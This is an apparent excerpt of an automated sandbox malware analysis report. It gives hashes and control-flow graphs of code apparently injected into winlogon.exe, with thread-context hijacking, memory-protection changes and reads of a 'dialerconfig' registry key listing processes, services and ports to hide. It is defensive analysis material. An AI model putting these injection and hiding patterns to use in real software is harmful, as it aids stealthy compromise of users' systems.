                                                • Opcode Fuzzy Hash: 0f8aca77b87f9ef16d75743d676047026a22584c86c2ad89418c322b7fa7f56f
                                                • Instruction Fuzzy Hash: 60F0A73131CF044FE744EE1DE445665B3D0FBA8310F10452FE449C3651DA21E4818782
                                                Memory Dump Source
                                                • Source File: 00000006.00000002.1408245209.00007FFE7DE60000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFE7DE60000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_6_2_7ffe7de60000_powershell.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 493f93de88153ad9927e6c8445d5f07d4e073f9849a6da683bf876f1de00c95c
                                                • Instruction ID: c4a78ccb9e04f24b5a95357efcbd092eb3d51eb14effacf5282fa505b0cea368
                                                • Opcode Fuzzy Hash: 493f93de88153ad9927e6c8445d5f07d4e073f9849a6da683bf876f1de00c95c
                                                • Instruction Fuzzy Hash: ABD05B3170C8184FDF98EA5CF451BE57381D7953207144166D40AC7285DD16DC82C7C0

                                                Execution Graph

                                                Execution Coverage:1.3%
                                                Dynamic/Decrypted Code Coverage:94.1%
                                                Signature Coverage:0%
                                                Total number of Nodes:102
                                                Total number of Limit Nodes:16
                                                execution_graph 21153 2ea8a6e2908 21154 2ea8a6e2936 21153->21154 21155 2ea8a6e2994 VirtualAlloc 21154->21155 21156 2ea8a6e29b8 21154->21156 21155->21156 21157 2ea8a693b99 21160 2ea8a693ae6 21157->21160 21158 2ea8a693b50 21159 2ea8a693b36 VirtualQuery 21159->21158 21159->21160 21160->21158 21160->21159 21161 2ea8a693b6a VirtualAlloc 21160->21161 21161->21158 21162 2ea8a693b9b GetLastError 21161->21162 21162->21158 21162->21160 21163 2ea8a691c28 21168 2ea8a691650 GetProcessHeap HeapAlloc 21163->21168 21165 2ea8a691c3e Sleep SleepEx 21166 2ea8a691c37 21165->21166 21166->21165 21167 2ea8a6915c0 StrCmpIW StrCmpW 21166->21167 21167->21166 21212 2ea8a691274 GetProcessHeap HeapAlloc GetProcessHeap HeapAlloc 21168->21212 21170 2ea8a691678 21213 2ea8a691274 GetProcessHeap HeapAlloc GetProcessHeap HeapAlloc 21170->21213 21172 2ea8a691689 21214 2ea8a691274 GetProcessHeap HeapAlloc GetProcessHeap HeapAlloc 21172->21214 21174 2ea8a691692 21215 2ea8a691274 GetProcessHeap HeapAlloc GetProcessHeap HeapAlloc 21174->21215 21176 2ea8a69169b 21177 2ea8a6916b6 RegOpenKeyExW 21176->21177 21178 2ea8a6916e8 RegOpenKeyExW 21177->21178 21179 2ea8a6918ce 21177->21179 21180 2ea8a691727 RegOpenKeyExW 21178->21180 21181 2ea8a691711 21178->21181 21179->21166 21183 2ea8a691762 RegOpenKeyExW 21180->21183 21184 2ea8a69174b 21180->21184 21223 2ea8a6912c8 16 API calls 21181->21223 21185 2ea8a691786 21183->21185 21186 2ea8a69179d RegOpenKeyExW 21183->21186 21216 2ea8a69104c RegQueryInfoKeyW 21184->21216 21224 2ea8a6912c8 16 API calls 21185->21224 21190 2ea8a6917d8 RegOpenKeyExW 21186->21190 21191 2ea8a6917c1 21186->21191 21187 2ea8a69171d RegCloseKey 21187->21180 21195 2ea8a691813 RegOpenKeyExW 21190->21195 21196 2ea8a6917fc 21190->21196 21225 2ea8a6912c8 16 API calls 21191->21225 21193 2ea8a691793 RegCloseKey 21193->21186 21199 2ea8a691837 21195->21199 21200 2ea8a69184e RegOpenKeyExW 21195->21200 21226 2ea8a6912c8 16 API calls 21196->21226 21197 2ea8a6917ce RegCloseKey 21197->21190 21204 2ea8a69104c 6 API calls 21199->21204 21201 2ea8a691872 21200->21201 21202 2ea8a691889 RegOpenKeyExW 21200->21202 21205 2ea8a69104c 6 API calls 21201->21205 21206 2ea8a6918c4 RegCloseKey 21202->21206 21207 2ea8a6918ad 21202->21207 21203 2ea8a691809 RegCloseKey 21203->21195 21208 2ea8a691844 RegCloseKey 21204->21208 21209 2ea8a69187f RegCloseKey 21205->21209 21206->21179 21210 2ea8a69104c 6 API calls 21207->21210 21208->21200 21209->21202 21211 2ea8a6918ba RegCloseKey 21210->21211 21211->21206 21212->21170 21213->21172 21214->21174 21215->21176 21217 2ea8a6911b5 RegCloseKey 21216->21217 21218 2ea8a6910b9 21216->21218 21217->21183 21218->21217 21219 2ea8a6910c7 RegEnumValueW 21218->21219 21220 2ea8a69111c 21219->21220 21220->21217 21220->21219 21221 2ea8a691149 GetProcessHeap HeapAlloc 21220->21221 21222 2ea8a69117f GetProcessHeap HeapFree 21220->21222 21221->21220 21222->21220 21223->21187 21224->21193 21225->21197 21226->21203 21227 2ea8a662908 21228 2ea8a662936 21227->21228 21229 2ea8a662994 VirtualAlloc 21228->21229 21232 2ea8a662aa7 21228->21232 21230 2ea8a6629b8 21229->21230 21229->21232 21231 2ea8a662a2b LoadLibraryA 21230->21231 21230->21232 21231->21230 21233 2ea8a69562d 21235 2ea8a695634 21233->21235 21234 2ea8a69569b 21235->21234 21236 2ea8a695717 VirtualProtect 21235->21236 21237 2ea8a695743 GetLastError 21236->21237 21238 2ea8a695751 21236->21238 21237->21238 21239 2ea8a692a7c 21241 2ea8a692ac1 21239->21241 21240 2ea8a692b20 21241->21240 21243 2ea8a693930 21241->21243 21244 2ea8a693952 21243->21244 21245 2ea8a69393d StrCmpNIW 21243->21245 21244->21241 21245->21244 21246 2ea8a695dd0 21247 2ea8a695ddd 21246->21247 21248 2ea8a695de9 21247->21248 21255 2ea8a695efa 21247->21255 21249 2ea8a695e1e 21248->21249 21250 2ea8a695e6d 21248->21250 21251 2ea8a695e46 SetThreadContext 21249->21251 21251->21250 21252 2ea8a695fde 21254 2ea8a695ffe 21252->21254 21268 2ea8a6944c0 VirtualFree 21252->21268 21253 2ea8a695f21 VirtualProtect FlushInstructionCache 21253->21255 21264 2ea8a694ed0 GetCurrentProcess 21254->21264 21255->21252 21255->21253 21258 2ea8a696003 21259 2ea8a696057 21258->21259 21260 2ea8a696017 ResumeThread 21258->21260 21269 2ea8a697a20 IsProcessorFeaturePresent RtlCaptureContext RtlLookupFunctionEntry RtlVirtualUnwind capture_previous_context 21259->21269 21261 2ea8a69604b 21260->21261 21261->21258 21263 2ea8a69609f 21265 2ea8a694eec 21264->21265 21266 2ea8a694f33 21265->21266 21267 2ea8a694f02 VirtualProtect FlushInstructionCache 21265->21267 21266->21258 21267->21265 21268->21254 21269->21263

                                                Control-flow Graph

                                                APIs
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000008.00000002.2636011863.000002EA8A690000.00000040.00000001.00020000.00000000.sdmp, Offset: 000002EA8A690000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_8_2_2ea8a690000_winlogon.jbxd
                                                Similarity
                                                • API ID: Heap$CloseOpen$Process$Alloc$EnumFreeInfoQueryValuelstrlen
                                                • String ID: SOFTWARE\dialerconfig$paths$pid$process_names$service_names$startup$tcp_local$tcp_remote$udp
                                                • API String ID: 106492572-2879589442
                                                • Opcode ID: 1a30f3953b7b2857fef7ab9bb527f69cc88a70ac074ccf0af09289a77df583cb
                                                • Instruction ID: db3879c5ad0b98bad965bb20c8a30dc2db96578691c2fed79534ac332aac2b2a
                                                • Opcode Fuzzy Hash: 1a30f3953b7b2857fef7ab9bb527f69cc88a70ac074ccf0af09289a77df583cb
                                                • Instruction Fuzzy Hash: BE713936350A9185EF90EF61E88869D63A4FB95B88F045172DE5F47B6CDF38E444D301

                                                Control-flow Graph

                                                • Executed
                                                • Not Executed
                                                control_flow_graph 51 2ea8a695c10-2ea8a695c37 52 2ea8a695c39-2ea8a695c48 51->52 53 2ea8a695c4b-2ea8a695c56 GetCurrentThreadId 51->53 52->53 54 2ea8a695c62-2ea8a695c69 53->54 55 2ea8a695c58-2ea8a695c5d 53->55 57 2ea8a695c7b-2ea8a695c8f 54->57 58 2ea8a695c6b-2ea8a695c76 call 2ea8a695a40 54->58 56 2ea8a69608f-2ea8a6960a6 call 2ea8a697a20 55->56 59 2ea8a695c9e-2ea8a695ca4 57->59 58->56 63 2ea8a695d75-2ea8a695d96 59->63 64 2ea8a695caa-2ea8a695cb3 59->64 69 2ea8a695d9c-2ea8a695dbc GetThreadContext 63->69 70 2ea8a695eff-2ea8a695f10 call 2ea8a69759f 63->70 67 2ea8a695cb5-2ea8a695cf8 call 2ea8a6986a0 64->67 68 2ea8a695cfa-2ea8a695d6d call 2ea8a6945f0 call 2ea8a694590 call 2ea8a694550 64->68 80 2ea8a695d70 67->80 68->80 73 2ea8a695dc2-2ea8a695de3 69->73 74 2ea8a695efa 69->74 83 2ea8a695f15-2ea8a695f1b 70->83 73->74 85 2ea8a695de9-2ea8a695df2 73->85 74->70 80->59 86 2ea8a695fde-2ea8a695fee 83->86 87 2ea8a695f21-2ea8a695f78 VirtualProtect FlushInstructionCache 83->87 89 2ea8a695e72-2ea8a695e83 85->89 90 2ea8a695df4-2ea8a695e05 85->90 91 2ea8a695ffe-2ea8a69600a call 2ea8a694ed0 86->91 92 2ea8a695ff0-2ea8a695ff7 86->92 95 2ea8a695fa9-2ea8a695fd9 call 2ea8a69798c 87->95 96 2ea8a695f7a-2ea8a695f84 87->96 97 2ea8a695ef5 89->97 98 2ea8a695e85-2ea8a695ea3 89->98 93 2ea8a695e07-2ea8a695e1c 90->93 94 2ea8a695e6d 90->94 113 2ea8a69600f-2ea8a696015 91->113 92->91 100 2ea8a695ff9 call 2ea8a6944c0 92->100 93->94 101 2ea8a695e1e-2ea8a695e68 call 2ea8a693a50 SetThreadContext 93->101 94->97 95->83 96->95 103 2ea8a695f86-2ea8a695fa1 call 2ea8a694470 96->103 98->97 105 2ea8a695ea5-2ea8a695eec call 2ea8a6939e0 98->105 100->91 101->94 103->95 105->97 116 2ea8a695ef0 call 2ea8a6975bd 105->116 117 2ea8a696057-2ea8a696075 113->117 118 2ea8a696017-2ea8a696055 ResumeThread call 2ea8a69798c 113->118 116->97 120 2ea8a696077-2ea8a696086 117->120 121 2ea8a696089 117->121 118->113 120->121 121->56
                                                APIs
                                                Memory Dump Source
                                                • Source File: 00000008.00000002.2636011863.000002EA8A690000.00000040.00000001.00020000.00000000.sdmp, Offset: 000002EA8A690000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_8_2_2ea8a690000_winlogon.jbxd
                                                Similarity
                                                • API ID: Thread$Current$Context
                                                • String ID:
                                                • API String ID: 1666949209-0
                                                • Opcode ID: 126e9ccac3b85b689de541a7ba0bb3b8a0d30515f50b6bbe7ef549e0900f3599
                                                • Instruction ID: 7abc3399b7363da3a6ea01246fa603f01a3695a5164fbe89fa8487ef91b524c8
                                                • Opcode Fuzzy Hash: 126e9ccac3b85b689de541a7ba0bb3b8a0d30515f50b6bbe7ef549e0900f3599
                                                • Instruction Fuzzy Hash: 29D1DD76248B88C1DEB0DB0AE49835A77A0F3C8B94F144166EACE47BA9DF3CD545CB01

                                                Control-flow Graph

                                                • Executed
                                                • Not Executed
                                                control_flow_graph 123 2ea8a6951b0-2ea8a6951dc 124 2ea8a6951ed-2ea8a6951f6 123->124 125 2ea8a6951de-2ea8a6951e6 123->125 126 2ea8a695207-2ea8a695210 124->126 127 2ea8a6951f8-2ea8a695200 124->127 125->124 128 2ea8a695212-2ea8a69521a 126->128 129 2ea8a695221-2ea8a69522a 126->129 127->126 128->129 130 2ea8a695236-2ea8a695241 GetCurrentThreadId 129->130 131 2ea8a69522c-2ea8a695231 129->131 132 2ea8a695243-2ea8a695248 130->132 133 2ea8a69524d-2ea8a695254 130->133 134 2ea8a6957b3-2ea8a6957ba 131->134 132->134 135 2ea8a695256-2ea8a69525c 133->135 136 2ea8a695261-2ea8a69526a 133->136 135->134 137 2ea8a695276-2ea8a695282 136->137 138 2ea8a69526c-2ea8a695271 136->138 139 2ea8a695284-2ea8a6952a9 137->139 140 2ea8a6952ae-2ea8a695305 call 2ea8a6957c0 * 2 137->140 138->134 139->134 145 2ea8a695307-2ea8a69530e 140->145 146 2ea8a69531a-2ea8a695323 140->146 149 2ea8a695316 145->149 150 2ea8a695310 145->150 147 2ea8a695335-2ea8a69533e 146->147 148 2ea8a695325-2ea8a695332 146->148 151 2ea8a695353-2ea8a695378 call 2ea8a697950 147->151 152 2ea8a695340-2ea8a695350 147->152 148->147 154 2ea8a695386-2ea8a69538a 149->154 153 2ea8a695390-2ea8a695396 150->153 162 2ea8a69540d-2ea8a695422 call 2ea8a693da0 151->162 163 2ea8a69537e 151->163 152->151 156 2ea8a6953c5-2ea8a6953cb 153->156 157 2ea8a695398-2ea8a6953b4 call 2ea8a694470 153->157 154->153 160 2ea8a6953f5-2ea8a695408 156->160 161 2ea8a6953cd-2ea8a6953ec call 2ea8a69798c 156->161 157->156 168 2ea8a6953b6-2ea8a6953be 157->168 160->134 161->160 170 2ea8a695424-2ea8a69542c 162->170 171 2ea8a695431-2ea8a69543a 162->171 163->154 168->156 170->154 172 2ea8a69544c-2ea8a69549a call 2ea8a698d50 171->172 173 2ea8a69543c-2ea8a695449 171->173 176 2ea8a6954a2-2ea8a6954aa 172->176 173->172 177 2ea8a6955b7-2ea8a6955bf 176->177 178 2ea8a6954b0-2ea8a69559b call 2ea8a697520 176->178 179 2ea8a695603-2ea8a69560b 177->179 180 2ea8a6955c1-2ea8a6955d4 call 2ea8a694670 177->180 190 2ea8a69559d 178->190 191 2ea8a69559f-2ea8a6955ae call 2ea8a694140 178->191 183 2ea8a695617-2ea8a695626 179->183 184 2ea8a69560d-2ea8a695615 179->184 195 2ea8a6955d6 180->195 196 2ea8a6955d8-2ea8a695601 180->196 188 2ea8a695628 183->188 189 2ea8a69562f 183->189 184->183 187 2ea8a695634-2ea8a695641 184->187 193 2ea8a695643 187->193 194 2ea8a695644-2ea8a695699 call 2ea8a6986a0 187->194 188->189 189->187 190->177 199 2ea8a6955b2 191->199 200 2ea8a6955b0 191->200 193->194 202 2ea8a6956a8-2ea8a695741 call 2ea8a6945f0 call 2ea8a694550 VirtualProtect 194->202 203 2ea8a69569b-2ea8a6956a3 194->203 195->179 196->177 199->176 200->177 208 2ea8a695743-2ea8a695748 GetLastError 202->208 209 2ea8a695751-2ea8a6957b1 202->209 208->209 209->134
                                                APIs
                                                Memory Dump Source
                                                • Source File: 00000008.00000002.2636011863.000002EA8A690000.00000040.00000001.00020000.00000000.sdmp, Offset: 000002EA8A690000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_8_2_2ea8a690000_winlogon.jbxd
                                                Similarity
                                                • API ID: CurrentThread
                                                • String ID:
                                                • API String ID: 2882836952-0
                                                • Opcode ID: 6dd4aa8fa755b3762cf53131d0cf7c3b2ca700ac8e0992d5332b6727d28f217d
                                                • Instruction ID: 8d6460839d33d96f242abc21ba7c0c12df2750016f6a5bc3f4448c71370291fe
                                                • Opcode Fuzzy Hash: 6dd4aa8fa755b3762cf53131d0cf7c3b2ca700ac8e0992d5332b6727d28f217d
                                                • Instruction Fuzzy Hash: 5402C732259BC086EBA0CB55F49835AB7A0F3C4794F145166EB8E87BA9DF7CD484CB01

                                                Control-flow Graph

                                                APIs
                                                Memory Dump Source
                                                • Source File: 00000008.00000002.2636011863.000002EA8A690000.00000040.00000001.00020000.00000000.sdmp, Offset: 000002EA8A690000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_8_2_2ea8a690000_winlogon.jbxd
                                                Similarity
                                                • API ID: CurrentProcessProtectVirtual$HandleModule
                                                • String ID:
                                                • API String ID: 1092925422-0
                                                • Opcode ID: a6312042db82c9c62213c4cc61283d131af5cc2d1631b4a6c699d8a5d8d1a662
                                                • Instruction ID: 521264bbf53bd2b0813ca0a2650e39ac3417809bf0e9bb18f90cf4a93a97dc9a
                                                • Opcode Fuzzy Hash: a6312042db82c9c62213c4cc61283d131af5cc2d1631b4a6c699d8a5d8d1a662
                                                • Instruction Fuzzy Hash: DD113C2A744B8282EF94DB21F40876AB6B0F749B84F084079DE9E07798EF3DE505C701

                                                Control-flow Graph

                                                APIs
                                                Memory Dump Source
                                                • Source File: 00000008.00000002.2636011863.000002EA8A690000.00000040.00000001.00020000.00000000.sdmp, Offset: 000002EA8A690000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_8_2_2ea8a690000_winlogon.jbxd
                                                Similarity
                                                • API ID: Virtual$AllocQuery
                                                • String ID:
                                                • API String ID: 31662377-0
                                                • Opcode ID: 6886080a5e420ef5f5b7cbc5977cea8f3533897ae81ff2ee1a15dfd3048d8c27
                                                • Instruction ID: 450e7cc7ddd998f7df9277ac51022a8db3f6fea65fb1db4acaee078049e9808a
                                                • Opcode Fuzzy Hash: 6886080a5e420ef5f5b7cbc5977cea8f3533897ae81ff2ee1a15dfd3048d8c27
                                                • Instruction Fuzzy Hash: 59315E62259AC581EFB0DA25E05835AA3A0F398784F148579F6CF46BACDF3CD1818B02

                                                Control-flow Graph

                                                APIs
                                                Memory Dump Source
                                                • Source File: 00000008.00000002.2636011863.000002EA8A690000.00000040.00000001.00020000.00000000.sdmp, Offset: 000002EA8A690000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_8_2_2ea8a690000_winlogon.jbxd
                                                Similarity
                                                • API ID: Current$FileModuleNameProcessProtectThreadVirtual$CreateFindHandlePath
                                                • String ID:
                                                • API String ID: 1683269324-0
                                                • Opcode ID: c29ba6944873534deeb84ee6eea4394d78c713a8ee642426403de072192bf5b7
                                                • Instruction ID: ac9eb215c53734babb2a3472e520c4cd677427538a40450ffdc9329e50ab56a8
                                                • Opcode Fuzzy Hash: c29ba6944873534deeb84ee6eea4394d78c713a8ee642426403de072192bf5b7
                                                • Instruction Fuzzy Hash: 78115770A907D292FFE1D731E90E36922D0AB58B44F4980B99A1F852DCEF3DF4849203

                                                Control-flow Graph

                                                APIs
                                                Memory Dump Source
                                                • Source File: 00000008.00000002.2636011863.000002EA8A690000.00000040.00000001.00020000.00000000.sdmp, Offset: 000002EA8A690000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_8_2_2ea8a690000_winlogon.jbxd
                                                Similarity
                                                • API ID: CacheCurrentFlushInstructionProcessProtectVirtual
                                                • String ID:
                                                • API String ID: 3733156554-0
                                                • Opcode ID: 5de13d273f800d719ddc7abbe3a208f931ebfdefdaf7bb09dce4947a89a2577f
                                                • Instruction ID: 8e9708fbd438fa44b350dad889db080b0ac2de83a8dc9e5857ae0fa7cae13542
                                                • Opcode Fuzzy Hash: 5de13d273f800d719ddc7abbe3a208f931ebfdefdaf7bb09dce4947a89a2577f
                                                • Instruction Fuzzy Hash: B8F03066268B84C0EAB0DB05E45934A67A0E7CC7E4F584161FA8E07BADCE3CD1818B05

                                                Control-flow Graph

                                                • Executed
                                                • Not Executed
                                                control_flow_graph 263 2ea8a662908-2ea8a662973 call 2ea8a660f34 * 4 272 2ea8a662b8b 263->272 273 2ea8a662979-2ea8a66297c 263->273 275 2ea8a662b8d-2ea8a662ba9 272->275 273->272 274 2ea8a662982-2ea8a662985 273->274 274->272 276 2ea8a66298b-2ea8a66298e 274->276 276->272 277 2ea8a662994-2ea8a6629b2 VirtualAlloc 276->277 277->272 278 2ea8a6629b8-2ea8a6629dc call 2ea8a660d6c 277->278 281 2ea8a6629de-2ea8a662a09 call 2ea8a660d6c 278->281 282 2ea8a662a0b-2ea8a662a12 278->282 281->282 284 2ea8a662a18-2ea8a662a25 282->284 285 2ea8a662ab2-2ea8a662ab9 282->285 284->285 289 2ea8a662a2b-2ea8a662a39 LoadLibraryA 284->289 286 2ea8a662abf-2ea8a662ad6 285->286 287 2ea8a662b6c-2ea8a662b89 285->287 286->287 290 2ea8a662adc 286->290 287->275 291 2ea8a662a9d-2ea8a662aa5 289->291 292 2ea8a662a3b-2ea8a662a45 289->292 296 2ea8a662ae2-2ea8a662af7 290->296 291->289 294 2ea8a662aa7-2ea8a662aac 291->294 293 2ea8a662a48-2ea8a662a4c 292->293 297 2ea8a662a4e-2ea8a662a52 293->297 298 2ea8a662a9a 293->298 294->285 299 2ea8a662b5b-2ea8a662b66 296->299 300 2ea8a662af9-2ea8a662b0a 296->300 301 2ea8a662a7d-2ea8a662a87 297->301 302 2ea8a662a54-2ea8a662a7b 297->302 298->291 299->287 299->296 304 2ea8a662b0c-2ea8a662b13 300->304 305 2ea8a662b15-2ea8a662b19 300->305 308 2ea8a662a8d-2ea8a662a98 301->308 302->308 309 2ea8a662b48-2ea8a662b59 304->309 306 2ea8a662b1b-2ea8a662b22 305->306 307 2ea8a662b24-2ea8a662b28 305->307 306->309 310 2ea8a662b3a-2ea8a662b3e 307->310 311 2ea8a662b2a-2ea8a662b38 307->311 308->293 309->299 309->300 310->309 312 2ea8a662b40-2ea8a662b43 310->312 311->309 312->309
                                                APIs
                                                Memory Dump Source
                                                • Source File: 00000008.00000002.2635017926.000002EA8A660000.00000040.00000001.00020000.00000000.sdmp, Offset: 000002EA8A660000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_8_2_2ea8a660000_winlogon.jbxd
                                                Similarity
                                                • API ID: AllocLibraryLoadVirtual
                                                • String ID:
                                                • API String ID: 3550616410-0
                                                • Opcode ID: f6ddeab5387358d888722616617f0efec67712a96652def8838ee087e5407534
                                                • Instruction ID: 7530aeb5896d8c73bd639e80f14959d458e078c826644fa535c5f8b5e5812d3d
                                                • Opcode Fuzzy Hash: f6ddeab5387358d888722616617f0efec67712a96652def8838ee087e5407534
                                                • Instruction Fuzzy Hash: B061F1B2B4169187EFA8CF26D48876DB391FB44B98F548135DA1E07789DB38F852C702

                                                Control-flow Graph

                                                APIs
                                                  • Part of subcall function 000002EA8A691650: GetProcessHeap.KERNEL32 ref: 000002EA8A69165B
                                                  • Part of subcall function 000002EA8A691650: HeapAlloc.KERNEL32 ref: 000002EA8A69166A
                                                  • Part of subcall function 000002EA8A691650: RegOpenKeyExW.ADVAPI32 ref: 000002EA8A6916DA
                                                  • Part of subcall function 000002EA8A691650: RegOpenKeyExW.ADVAPI32 ref: 000002EA8A691707
                                                  • Part of subcall function 000002EA8A691650: RegCloseKey.ADVAPI32 ref: 000002EA8A691721
                                                  • Part of subcall function 000002EA8A691650: RegOpenKeyExW.ADVAPI32 ref: 000002EA8A691741
                                                  • Part of subcall function 000002EA8A691650: RegCloseKey.ADVAPI32 ref: 000002EA8A69175C
                                                  • Part of subcall function 000002EA8A691650: RegOpenKeyExW.ADVAPI32 ref: 000002EA8A69177C
                                                  • Part of subcall function 000002EA8A691650: RegCloseKey.ADVAPI32 ref: 000002EA8A691797
                                                  • Part of subcall function 000002EA8A691650: RegOpenKeyExW.ADVAPI32 ref: 000002EA8A6917B7
                                                  • Part of subcall function 000002EA8A691650: RegCloseKey.ADVAPI32 ref: 000002EA8A6917D2
                                                  • Part of subcall function 000002EA8A691650: RegOpenKeyExW.ADVAPI32 ref: 000002EA8A6917F2
                                                • Sleep.KERNEL32 ref: 000002EA8A691C43
                                                • SleepEx.KERNELBASE ref: 000002EA8A691C49
                                                  • Part of subcall function 000002EA8A691650: RegCloseKey.ADVAPI32 ref: 000002EA8A69180D
                                                  • Part of subcall function 000002EA8A691650: RegOpenKeyExW.ADVAPI32 ref: 000002EA8A69182D
                                                  • Part of subcall function 000002EA8A691650: RegCloseKey.ADVAPI32 ref: 000002EA8A691848
                                                  • Part of subcall function 000002EA8A691650: RegOpenKeyExW.ADVAPI32 ref: 000002EA8A691868
                                                  • Part of subcall function 000002EA8A691650: RegCloseKey.ADVAPI32 ref: 000002EA8A691883
                                                  • Part of subcall function 000002EA8A691650: RegOpenKeyExW.ADVAPI32 ref: 000002EA8A6918A3
                                                  • Part of subcall function 000002EA8A691650: RegCloseKey.ADVAPI32 ref: 000002EA8A6918BE
                                                  • Part of subcall function 000002EA8A691650: RegCloseKey.ADVAPI32 ref: 000002EA8A6918C8
                                                Memory Dump Source
                                                • Source File: 00000008.00000002.2636011863.000002EA8A690000.00000040.00000001.00020000.00000000.sdmp, Offset: 000002EA8A690000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_8_2_2ea8a690000_winlogon.jbxd
                                                Similarity
                                                • API ID: CloseOpen$HeapSleep$AllocProcess
                                                • String ID:
                                                • API String ID: 1534210851-0
                                                • Opcode ID: 446663f49501c54a1dde533fa37134df150f915d943a345b55ac37b77b82859e
                                                • Instruction ID: ff06fb8c1534adee81013544e023c724b3c0671a7b7a89f4a78f2d2e5d28a12c
                                                • Opcode Fuzzy Hash: 446663f49501c54a1dde533fa37134df150f915d943a345b55ac37b77b82859e
                                                • Instruction Fuzzy Hash: 7431D16528068191FFD4DF36D64935E13A4AB44BC0F2C90B19E1F8779EEF28E4558252

                                                Control-flow Graph

                                                • Executed
                                                • Not Executed
                                                control_flow_graph 352 2ea8a6e2908-2ea8a6e2973 call 2ea8a6e0f34 * 4 361 2ea8a6e2979-2ea8a6e297c 352->361 362 2ea8a6e2b8b 352->362 361->362 364 2ea8a6e2982-2ea8a6e2985 361->364 363 2ea8a6e2b8d-2ea8a6e2ba9 362->363 364->362 365 2ea8a6e298b-2ea8a6e298e 364->365 365->362 366 2ea8a6e2994-2ea8a6e29b2 VirtualAlloc 365->366 366->362 367 2ea8a6e29b8-2ea8a6e29dc call 2ea8a6e0d6c 366->367 370 2ea8a6e29de-2ea8a6e2a09 call 2ea8a6e0d6c 367->370 371 2ea8a6e2a0b-2ea8a6e2a12 367->371 370->371 373 2ea8a6e2a18-2ea8a6e2a25 371->373 374 2ea8a6e2ab2-2ea8a6e2ab9 371->374 373->374 378 2ea8a6e2a2b-2ea8a6e2a39 373->378 376 2ea8a6e2abf-2ea8a6e2ad6 374->376 377 2ea8a6e2b6c-2ea8a6e2b89 374->377 376->377 379 2ea8a6e2adc 376->379 377->363 385 2ea8a6e2a9d-2ea8a6e2aa5 378->385 386 2ea8a6e2a3b-2ea8a6e2a45 378->386 381 2ea8a6e2ae2-2ea8a6e2af7 379->381 383 2ea8a6e2af9-2ea8a6e2b0a 381->383 384 2ea8a6e2b5b-2ea8a6e2b66 381->384 389 2ea8a6e2b15-2ea8a6e2b19 383->389 390 2ea8a6e2b0c-2ea8a6e2b13 383->390 384->377 384->381 385->378 387 2ea8a6e2aa7-2ea8a6e2aac 385->387 391 2ea8a6e2a48-2ea8a6e2a4c 386->391 387->374 393 2ea8a6e2b24-2ea8a6e2b28 389->393 394 2ea8a6e2b1b-2ea8a6e2b22 389->394 392 2ea8a6e2b48-2ea8a6e2b59 390->392 395 2ea8a6e2a4e-2ea8a6e2a52 391->395 396 2ea8a6e2a9a 391->396 392->383 392->384 397 2ea8a6e2b3a-2ea8a6e2b3e 393->397 398 2ea8a6e2b2a-2ea8a6e2b38 393->398 394->392 399 2ea8a6e2a54-2ea8a6e2a7b 395->399 400 2ea8a6e2a7d-2ea8a6e2a87 395->400 396->385 397->392 402 2ea8a6e2b40-2ea8a6e2b43 397->402 398->392 401 2ea8a6e2a8d-2ea8a6e2a98 399->401 400->401 401->391 402->392
                                                APIs
                                                Memory Dump Source
                                                • Source File: 00000008.00000002.2638717540.000002EA8A6E0000.00000040.00000400.00020000.00000000.sdmp, Offset: 000002EA8A6E0000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_8_2_2ea8a6e0000_winlogon.jbxd
                                                Similarity
                                                • API ID: AllocVirtual
                                                • String ID:
                                                • API String ID: 4275171209-0
                                                • Opcode ID: f6ddeab5387358d888722616617f0efec67712a96652def8838ee087e5407534
                                                • Instruction ID: ea5719658bc5e9eecd2a481221e652209658dcdda67c6ccf684edb6ba3dc9695
                                                • Opcode Fuzzy Hash: f6ddeab5387358d888722616617f0efec67712a96652def8838ee087e5407534
                                                • Instruction Fuzzy Hash: C561F76274169187EFA8EF29D44876D7392F744B58F648035EA1E07789DB38F872C701

                                                Control-flow Graph

                                                • Executed
                                                • Not Executed
                                                control_flow_graph 466 2ea8a692cdc-2ea8a692d55 call 2ea8a6aecc0 469 2ea8a692d5b-2ea8a692d61 466->469 470 2ea8a693090-2ea8a6930b3 466->470 469->470 471 2ea8a692d67-2ea8a692d6a 469->471 471->470 472 2ea8a692d70-2ea8a692d73 471->472 472->470 473 2ea8a692d79-2ea8a692d89 GetModuleHandleA 472->473 474 2ea8a692d8b-2ea8a692d9b GetProcAddress 473->474 475 2ea8a692d9d 473->475 476 2ea8a692da0-2ea8a692dbe 474->476 475->476 476->470 478 2ea8a692dc4-2ea8a692de3 StrCmpNIW 476->478 478->470 479 2ea8a692de9-2ea8a692ded 478->479 479->470 480 2ea8a692df3-2ea8a692dfd 479->480 480->470 481 2ea8a692e03-2ea8a692e0a 480->481 481->470 482 2ea8a692e10-2ea8a692e23 481->482 483 2ea8a692e33 482->483 484 2ea8a692e25-2ea8a692e31 482->484 485 2ea8a692e36-2ea8a692e3a 483->485 484->485 486 2ea8a692e4a 485->486 487 2ea8a692e3c-2ea8a692e48 485->487 488 2ea8a692e4d-2ea8a692e57 486->488 487->488 489 2ea8a692f4d-2ea8a692f51 488->489 490 2ea8a692e5d-2ea8a692e60 488->490 491 2ea8a693082-2ea8a69308a 489->491 492 2ea8a692f57-2ea8a692f5a 489->492 493 2ea8a692e72-2ea8a692e7c 490->493 494 2ea8a692e62-2ea8a692e6f call 2ea8a691a14 490->494 491->470 491->482 495 2ea8a692f6b-2ea8a692f75 492->495 496 2ea8a692f5c-2ea8a692f68 call 2ea8a691a14 492->496 498 2ea8a692e7e-2ea8a692e8b 493->498 499 2ea8a692eb0-2ea8a692eba 493->499 494->493 503 